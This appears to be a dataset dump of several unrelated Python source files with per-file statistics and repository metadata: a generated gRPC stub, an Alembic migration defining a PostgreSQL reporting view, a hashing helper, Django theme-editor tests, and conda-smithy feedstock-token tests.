metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelUpdateStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelValidationRequestStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelValidationRequestStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def ModelValidationStream(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_stream(request, target, '/grpc.Combiner/ModelValidationStream',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ClientAvailableMessage.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout,
metadata)
@staticmethod
def SendModelUpdateRequest(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelUpdateRequest',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdateRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelUpdate(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelUpdate',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelUpdate.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelValidationRequest(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelValidationRequest',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidationRequest.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def SendModelValidation(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
"""
:param request:
:param target:
:param options:
:param channel_credentials:
:param call_credentials:
:param insecure:
:param compression:
:param wait_for_ready:
:param timeout:
:param metadata:
:return:
"""
return grpc.experimental.unary_unary(request, target, '/grpc.Combiner/SendModelValidation',
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.ModelValidation.SerializeToString,
fedn_dot_common_dot_net_dot_grpc_dot_fedn__pb2.Response.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 43.972906 | 134 | 0.607013 | 4,777 | 53,559 | 6.395855 | 0.034331 | 0.030701 | 0.05659 | 0.069649 | 0.889013 | 0.870782 | 0.870782 | 0.844467 | 0.844467 | 0.829673 | 0 | 0.003719 | 0.327284 | 53,559 | 1,217 | 135 | 44.009039 | 0.844269 | 0.136261 | 0 | 0.631433 | 1 | 0 | 0.063135 | 0.030912 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075104 | false | 0 | 0.002782 | 0 | 0.129346 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0730224fab69699062473b8e490358a68817f64c | 3,779 | py | Python | datawarehouse/edw_migrations/versions/58c33fb2322c_update_viw_cfrrfdreport.py | bcgov/foi-reporting | 25856ce87b668df964ddd16ac7459fae4aa6a7c5 | [
"Apache-2.0"
] | null | null | null | datawarehouse/edw_migrations/versions/58c33fb2322c_update_viw_cfrrfdreport.py | bcgov/foi-reporting | 25856ce87b668df964ddd16ac7459fae4aa6a7c5 | [
"Apache-2.0"
] | 3 | 2022-01-05T18:01:41.000Z | 2022-02-08T21:51:32.000Z | datawarehouse/edw_migrations/versions/58c33fb2322c_update_viw_cfrrfdreport.py | bcgov/foi-reporting | 25856ce87b668df964ddd16ac7459fae4aa6a7c5 | [
"Apache-2.0"
] | null | null | null | """update_viw_cfrrfdreport
Revision ID: 58c33fb2322c
Revises: b6a8f2338f16
Create Date: 2022-03-17 14:50:05.897051
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58c33fb2322c'
down_revision = 'b6a8f2338f16'
branch_labels = None
depends_on = None
def upgrade():
op.execute('DROP VIEW public.viw_cfrrfdreport; CREATE OR REPLACE VIEW public.viw_cfrrfdreport AS SELECT r.visualrequestfilenumber AS "Request ID", rd.redactiondescription AS "Request Description", rfd.createddate AS "Request Start Date", eco2.officedescription AS "Office of Primary Interest", rfd.completeddate AS "Completed Date", rfds.reqfordocstatus AS "RFD Status", rd.status AS "Request Status", rd.primaryusername AS "Primary User", rfd.requestdescription AS "RFD Comments", frfdcf.rfdage AS "RFD Age", rd.requestage AS "Request Age", rfd.duedate AS "Due Date", rfd.createddate AS "Requested Date", frfdcf.remainingdays AS "Remaining Days", frfdcf.elapseddays AS "Processed Days", rt.requesttypename AS "Request Type", eco.officedescription AS "Office Name", eco.officecode AS "Office Code" FROM "factRequestForDocuments" rfd LEFT JOIN "dimRequests" r ON rfd.foirequestid = r.foirequestid LEFT JOIN "factRequestDetails" rd ON r.foirequestid = rd.foirequestid AND rd.activeflag = \'Y\'::bpchar LEFT JOIN "dimRequestForDocumentsStatus" rfds ON rfd.reqfordocstatusid = rfds.reqfordocstatusid LEFT JOIN "dimRequestTypes" rt ON rt.requesttypeid = rfd.requesttypeid LEFT JOIN "dimECOffice" eco ON eco.officeid = rfd.officeid LEFT JOIN "dimECOffice" eco2 ON eco2.officeid = rfd.programofficeid LEFT JOIN "factRequestRFDCalculatedFields" frfdcf ON rfd.foirequestid = frfdcf.foirequestid and rfd.actionid = frfdcf.actionid WHERE rfd.activeflag = \'Y\'::bpchar;ALTER TABLE public.viw_cfrrfdreport OWNER TO postgres;GRANT ALL ON TABLE public.viw_cfrrfdreport TO postgres;GRANT SELECT ON TABLE public.viw_cfrrfdreport TO redash_role;')
def downgrade():
op.execute('DROP VIEW public.viw_cfrrfdreport; CREATE OR REPLACE VIEW public.viw_cfrrfdreport AS SELECT r.visualrequestfilenumber AS "Request ID", rd.redactiondescription AS "Request Description", rfd.createddate AS "Request Start Date", eco2.officedescription AS "Office of Primary Interest", rfd.completeddate AS "Completed Date", rfds.reqfordocstatus AS "RFD Status", rd.status AS "Request Status", rd.primaryusername AS "Primary User", rfd.requestdescription AS "RFD Comments", frfdcf.rfdage AS "RFD Age", rd.requestage AS "Request Age", rfd.duedate AS "Due Date", rfd.createddate AS "Requested Date", frfdcf.remainingdays AS "Remaining Days", frfdcf.elapseddays AS "Processed Days", rt.requesttypename AS "Request Type", eco.officedescription AS "Office Name", eco.officecode AS "Office Code" FROM "factRequestForDocuments" rfd LEFT JOIN "dimRequests" r ON rfd.foirequestid = r.foirequestid LEFT JOIN "factRequestDetails" rd ON r.foirequestid = rd.foirequestid AND rd.activeflag = \'Y\'::bpchar LEFT JOIN "dimRequestForDocumentsStatus" rfds ON rfd.reqfordocstatusid = rfds.reqfordocstatusid LEFT JOIN "dimRequestTypes" rt ON rt.requesttypeid = rfd.requesttypeid LEFT JOIN "dimECOffice" eco ON eco.officeid = rfd.officeid LEFT JOIN "dimECOffice" eco2 ON eco2.officeid = rfd.programofficeid LEFT JOIN "factRequestRFDCalculatedFields" frfdcf ON rfd.foirequestid = frfdcf.foirequestid and rfd.actionid = frfdcf.actionid WHERE rfd.activeflag = \'Y\'::bpchar;ALTER TABLE public.viw_cfrrfdreport OWNER TO postgres;GRANT ALL ON TABLE public.viw_cfrrfdreport TO postgres;GRANT SELECT ON TABLE public.viw_cfrrfdreport TO redash_role;')
| 151.16 | 1,717 | 0.766076 | 479 | 3,779 | 6.008351 | 0.240084 | 0.038916 | 0.072967 | 0.054204 | 0.910354 | 0.910354 | 0.910354 | 0.910354 | 0.910354 | 0.910354 | 0 | 0.018069 | 0.150569 | 3,779 | 24 | 1,718 | 157.458333 | 0.878505 | 0.040222 | 0 | 0.2 | 0 | 0.6 | 0.941144 | 0.198397 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
0762ff1b642cb7629e384f4505de06f97bbfaa3b | 103 | py | Python | transformertopic/utils/generateTextId.py | nareto/transformertopic | cb3b06a325b56d147d8bcb51b9140ade6766eba2 | [
"MIT"
] | 1 | 2021-11-29T13:25:23.000Z | 2021-11-29T13:25:23.000Z | transformertopic/utils/generateTextId.py | nareto/transformertopic | cb3b06a325b56d147d8bcb51b9140ade6766eba2 | [
"MIT"
] | null | null | null | transformertopic/utils/generateTextId.py | nareto/transformertopic | cb3b06a325b56d147d8bcb51b9140ade6766eba2 | [
"MIT"
] | null | null | null | import hashlib
def generateTextId(text: str):
return hashlib.md5(text.encode('utf-8')).hexdigest() | 25.75 | 56 | 0.737864 | 14 | 103 | 5.428571 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021739 | 0.106796 | 103 | 4 | 56 | 25.75 | 0.804348 | 0 | 0 | 0 | 1 | 0 | 0.048077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
ab010c7c987671dc0feb25087fc07096c9409642 | 19,079 | py | Python | tests/gbe/themes/test_manage_theme.py | bethlakshmi/gbe-divio-djangocms-python2.7 | 6e9b2c894162524bbbaaf73dcbe927988707231d | [
"Apache-2.0"
] | 1 | 2021-03-14T11:56:47.000Z | 2021-03-14T11:56:47.000Z | tests/gbe/themes/test_manage_theme.py | bethlakshmi/gbe-divio-djangocms-python2.7 | 6e9b2c894162524bbbaaf73dcbe927988707231d | [
"Apache-2.0"
] | 180 | 2019-09-15T19:52:46.000Z | 2021-11-06T23:48:01.000Z | tests/gbe/themes/test_manage_theme.py | bethlakshmi/gbe-divio-djangocms-python2.7 | 6e9b2c894162524bbbaaf73dcbe927988707231d | [
"Apache-2.0"
] | null | null | null | from django.test import TestCase
from django.test import Client
from django.urls import reverse
from tests.factories.gbe_factories import (
ProfileFactory,
StyleElementFactory,
StyleGroupFactory,
StyleLabelFactory,
StyleValueFactory,
StyleValueImageFactory,
StyleVersionFactory,
TestURLFactory,
UserFactory,
)
from filer.models.imagemodels import Image
from tests.functions.gbe_functions import (
grant_privilege,
login_as,
set_image
)
from easy_thumbnails.files import get_thumbnailer
class TestManageTheme(TestCase):
view_name = "manage_theme"
px_input = ('<input type="number" name="%d-value_%d" value="%d" ' +
'class="pixel-input" required id="id_%d-value_%d">')
def setUp(self):
self.client = Client()
self.user = ProfileFactory().user_object
grant_privilege(self.user, u'Theme Editor')
self.value = StyleValueFactory()
self.url = reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk])
self.title = "Manage {}, version {:.1f}".format(
self.value.style_version.name,
self.value.style_version.number)
self.style_url = reverse(
"theme_style",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk])
def test_no_login(self):
response = self.client.get(self.url)
self.assertRedirects(response,
"/login/?next=%s" % self.url,
fetch_redirect_response=False)
def test_unauthorized_user(self):
login_as(ProfileFactory(), self)
response = self.client.get(self.url)
self.assertEqual(403, response.status_code)
def test_get(self):
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, self.title)
self.assertContains(response, self.value.value)
self.assertContains(response,
self.value.style_property.selector)
self.assertContains(response,
self.value.style_property.selector.used_for)
self.assertContains(response,
self.value.style_property.style_property)
self.assertContains(response, self.style_url)
def test_get_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
test_url = TestURLFactory()
self.value.style_property.label.group.test_urls.add(test_url)
same_elem_label = StyleValueFactory(
style_property__label=self.value.style_property.label,
style_property__element=self.value.style_property.element,
style_version=self.value.style_version)
same_label = StyleValueFactory(
style_property__label=self.value.style_property.label,
style_property__element=StyleElementFactory(
group=self.value.style_property.label.group),
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, self.value.value)
self.assertContains(response, same_elem_label.value)
self.assertContains(response, same_label.value)
self.assertContains(response,
self.value.style_property.label.name)
self.assertContains(response,
self.value.style_property.element.sample_html)
self.assertContains(response,
same_label.style_property.element.sample_html)
self.assertContains(response,
self.value.style_property.label.group.name)
self.assertContains(response, test_url.display_name)
def test_get_image(self):
Image.objects.all().delete()
other_image = set_image()
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_1" checked>''' % (
image_style.pk,
image_style.image.pk,
image_style.pk),
html=True)
self.assertNotContains(
response,
get_thumbnailer(other_image).get_thumbnail(
{'size': (100, 100), 'crop': False}).url)
def test_get_empty(self):
empty = StyleVersionFactory()
login_as(self.user, self)
response = self.client.get(reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[empty.pk]))
self.assertContains(
response,
"Manage {}, version {:.1f}".format(empty.name, empty.number))
self.assertContains(response, reverse(
"theme_style",
urlconf="gbe.themes.urls",
args=[empty.pk]))
def test_get_bad_id(self):
login_as(self.user, self)
response = self.client.get(reverse(
self.view_name,
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk+1]))
self.assertEqual(404, response.status_code)
def test_post_finish(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'finish': "Finish",
}, follow=True)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertRedirects(response, "%s?changed_id=%d" % (
reverse('themes_list', urlconf='gbe.themes.urls'),
self.value.style_version.pk))
def test_post_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'finish': "Finish",
}, follow=True)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertRedirects(response, "%s?changed_id=%d" % (
reverse('themes_list', urlconf='gbe.themes.urls'),
self.value.style_version.pk))
def test_post_update(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'update': "Update",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Updated %s" % self.value.style_version)
self.assertContains(response, 'rgba(255,255,255,0)')
self.assertContains(response,
self.value.style_property.selector)
self.assertContains(response,
self.value.style_property.selector.used_for)
self.assertContains(response,
self.value.style_property.style_property)
self.assertContains(response, self.style_url)
def test_post_update_change_image(self):
Image.objects.all().delete()
other_image = set_image(folder_name='Backgrounds')
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-style_property' % image_style.pk:
image_style.style_property.pk,
"%s-image" % image_style.pk: other_image.pk,
"%s-add_image" % image_style.pk: "",
'update': "Update",
}, follow=True)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_2" checked>''' % (
image_style.pk,
other_image.pk,
image_style.pk),
html=True)
def test_post_update_upload_image(self):
Image.objects.all().delete()
UserFactory(username='admin_img')
image_style = StyleValueImageFactory(
style_version=self.value.style_version,
image=set_image(folder_name='Backgrounds'))
file1 = open("tests/gbe/gbe_pagebanner.png", 'rb')
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-style_property' % image_style.pk:
image_style.style_property.pk,
"%s-image" % image_style.pk: image_style.image.pk,
"%s-add_image" % image_style.pk: file1,
'update': "Update",
}, follow=True)
self.assertContains(response,
image_style.style_property.selector)
self.assertContains(response,
image_style.style_property.style_property)
self.assertContains(
response,
'''<input type="radio" name="%s-image" value="%s"
id="id_%s-image_1" checked>''' % (
image_style.pk,
image_style.image.pk + 1,
image_style.pk),
html=True)
def test_cancel(self):
login_as(self.user, self)
response = self.client.post(
self.url,
data={'cancel': "Cancel"},
follow=True)
self.assertContains(response, "The last update was canceled.")
self.assertRedirects(response,
reverse("themes_list", urlconf="gbe.themes.urls"))
def test_post_bad_data(self):
login_as(self.user, self)
response = self.client.post(self.url, data={
'finish': "Finish",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
self.assertContains(response, "This field is required.")
self.assertContains(response, self.style_url)
def test_post_bad_data_in_group(self):
self.value.style_property.label = StyleLabelFactory()
self.value.style_property.element = StyleElementFactory(
group=self.value.style_property.label.group)
self.value.style_property.save()
login_as(self.user, self)
response = self.client.post(self.url, data={
'finish': "Finish",
}, follow=True)
self.assertContains(response, self.title)
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
self.assertContains(response, "This field is required.")
self.assertContains(response, self.style_url)
def test_get_complicated_property(self):
from gbe_forms_text import style_value_help
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1)",
parseable_values="5 4 3 rgba(10,10,10,1)",
style_property__style_property="text-shadow",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(
response,
self.px_input % (complex_value.pk, 0, 5, complex_value.pk, 0),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 1, 4, complex_value.pk, 1),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 2, 3, complex_value.pk, 2),
html=True)
self.assertContains(response,
complex_value.style_property.selector)
self.assertContains(response,
complex_value.style_property.style_property)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
self.assertContains(response, style_value_help["text-shadow-0"])
self.assertContains(response, style_value_help["text-shadow-1"])
self.assertContains(response, style_value_help["text-shadow-2"])
self.assertContains(response, style_value_help["text-shadow-3"])
def test_get_complicated_messed_up_property(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px rgba(10,10,10,1)",
parseable_values="5px 4px rgba(10,10,10,1)",
style_property__value_type="px px px rgba",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['mismatch'],
"[\'5px\', \'4px\', \'rgba(10,10,10,1)\']"))
def test_post_complicated_property(self):
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1)",
parseable_values="5 4 3 rgba(10,10,10,1)",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-value_0' % complex_value.pk: "0",
'%s-style_property' % (
complex_value.pk): complex_value.style_property.pk,
'%s-value_1' % complex_value.pk: "10",
'%s-value_2' % complex_value.pk: "15",
'%s-value_3' % complex_value.pk: "rgba(50,50,50,0.5)",
'update': "Update",
}, follow=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 0, 0, complex_value.pk, 0),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 1, 10, complex_value.pk, 1),
html=True)
self.assertContains(
response,
self.px_input % (complex_value.pk, 2, 15, complex_value.pk, 2),
html=True)
self.assertContains(response, "rgba(50,50,50,0.5)")
self.assertContains(response,
complex_value.style_property.selector)
self.assertContains(response,
complex_value.style_property.style_property)
self.assertContains(response, reverse(
"clone_theme",
urlconf="gbe.themes.urls",
args=[self.value.style_version.pk]))
def test_post_complicated_messed_up_property(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px 3px",
parseable_values="5 4 3",
style_property__value_type="px px px rgba",
style_property__value_template="{}px {}px {}px {}",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.post(self.url, data={
'%s-value_0' % self.value.pk: "rgba(255,255,255,0)",
'%s-style_property' % self.value.pk: self.value.style_property.pk,
'%s-value_0' % complex_value.pk: "0",
'%s-style_property' % (
complex_value.pk): complex_value.style_property.pk,
'%s-value_1' % complex_value.pk: "10",
'%s-value_2' % complex_value.pk: "15",
'%s-value_3' % complex_value.pk: "rgba(50,50,50,0.5)",
'update': "Update",
}, follow=True)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['mismatch'],
"[\'5\', \'4\', \'3\']"))
self.assertContains(
response,
"Something was wrong, correct the errors below and try again.")
def test_get_bad_value_template(self):
from gbe_forms_text import theme_help
complex_value = StyleValueFactory(
value="5px 4px 3px rgba(10,10,10,1) bad",
parseable_values="5 4 3 rgba(10,10,10,1) bad",
style_property__style_property="text-shadow",
style_property__value_type="px px px rgba bad",
style_property__value_template="{}px {}px {}px {} bad",
style_property__selector=self.value.style_property.selector,
style_version=self.value.style_version)
login_as(self.user, self)
response = self.client.get(self.url)
self.assertContains(response, "%s, VALUES: %s" % (
theme_help['bad_elem'],
"px px px rgba bad"))
| 42.970721 | 79 | 0.59956 | 2,153 | 19,079 | 5.107757 | 0.080817 | 0.109939 | 0.156043 | 0.076021 | 0.855506 | 0.833045 | 0.818405 | 0.791852 | 0.739293 | 0.72156 | 0 | 0.019763 | 0.283925 | 19,079 | 443 | 80 | 43.06772 | 0.785171 | 0 | 0 | 0.706024 | 0 | 0 | 0.115407 | 0.002606 | 0 | 0 | 0 | 0 | 0.175904 | 1 | 0.050602 | false | 0 | 0.026506 | 0 | 0.084337 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ab3f7337aa8f5076feda4f5e7d79921b1e2b1880 | 16,461 | py | Python | tests/test_feedstock_tokens.py | h-vetinari/conda-smithy | 5d1d3ac4a2253a601b626927ecbec8c305919236 | [
"BSD-3-Clause"
] | 122 | 2015-07-11T21:17:59.000Z | 2022-03-25T02:03:01.000Z | tests/test_feedstock_tokens.py | h-vetinari/conda-smithy | 5d1d3ac4a2253a601b626927ecbec8c305919236 | [
"BSD-3-Clause"
] | 1,377 | 2015-07-23T02:58:36.000Z | 2022-03-30T13:13:54.000Z | tests/test_feedstock_tokens.py | h-vetinari/conda-smithy | 5d1d3ac4a2253a601b626927ecbec8c305919236 | [
"BSD-3-Clause"
] | 153 | 2015-07-12T14:11:55.000Z | 2022-02-19T19:38:59.000Z | import os
import json
from unittest import mock
import pytest
import scrypt
from conda_smithy.feedstock_tokens import (
generate_and_write_feedstock_token,
read_feedstock_token,
feedstock_token_exists,
register_feedstock_token,
register_feedstock_token_with_proviers,
is_valid_feedstock_token,
)
from conda_smithy.ci_register import drone_default_endpoint
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_feedstock_tokens_roundtrip(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "foo"
pth = os.path.expanduser("~/.conda-smithy/foo_%s.token" % project)
token_json_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
os.makedirs(os.path.join(tmpdir, "tokens"), exist_ok=True)
try:
generate_and_write_feedstock_token(user, project)
assert os.path.exists(pth)
register_feedstock_token(user, project, repo)
assert os.path.exists(token_json_pth)
with open(pth, "r") as fp:
feedstock_token = fp.read().strip()
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
finally:
if os.path.exists(pth):
os.remove(pth)
assert retval
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_is_valid_feedstock_token_nofile(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "conda-forge"
feedstock_token = "akdjhfl"
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
assert not retval
@pytest.mark.parametrize("project", ["bar", "bar-feedstock"])
@pytest.mark.parametrize(
"repo", ["GITHUB_TOKEN", "${GITHUB_TOKEN}", "GH_TOKEN", "${GH_TOKEN}"]
)
@mock.patch("conda_smithy.feedstock_tokens.tempfile")
@mock.patch("conda_smithy.feedstock_tokens.git")
@mock.patch("conda_smithy.github.gh_token")
def test_is_valid_feedstock_token_badtoken(
gh_mock, git_mock, tmp_mock, tmpdir, repo, project
):
gh_mock.return_value = "abc123"
tmp_mock.TemporaryDirectory.return_value.__enter__.return_value = str(
tmpdir
)
user = "conda-forge"
feedstock_token = "akdjhfl"
token_pth = os.path.join(tmpdir, "tokens", "%s.json" % project)
os.makedirs(os.path.dirname(token_pth), exist_ok=True)
with open(token_pth, "w") as fp:
json.dump({"salt": b"adf".hex(), "hashed_token": b"fgh".hex()}, fp)
retval = is_valid_feedstock_token(user, project, feedstock_token, repo)
assert not retval
def test_generate_and_write_feedstock_token():
user = "bar"
repo = "foo"
pth = os.path.expanduser("~/.conda-smithy/bar_foo.token")
try:
generate_and_write_feedstock_token(user, repo)
assert os.path.exists(pth)
# we cannot do it twice
with pytest.raises(RuntimeError):
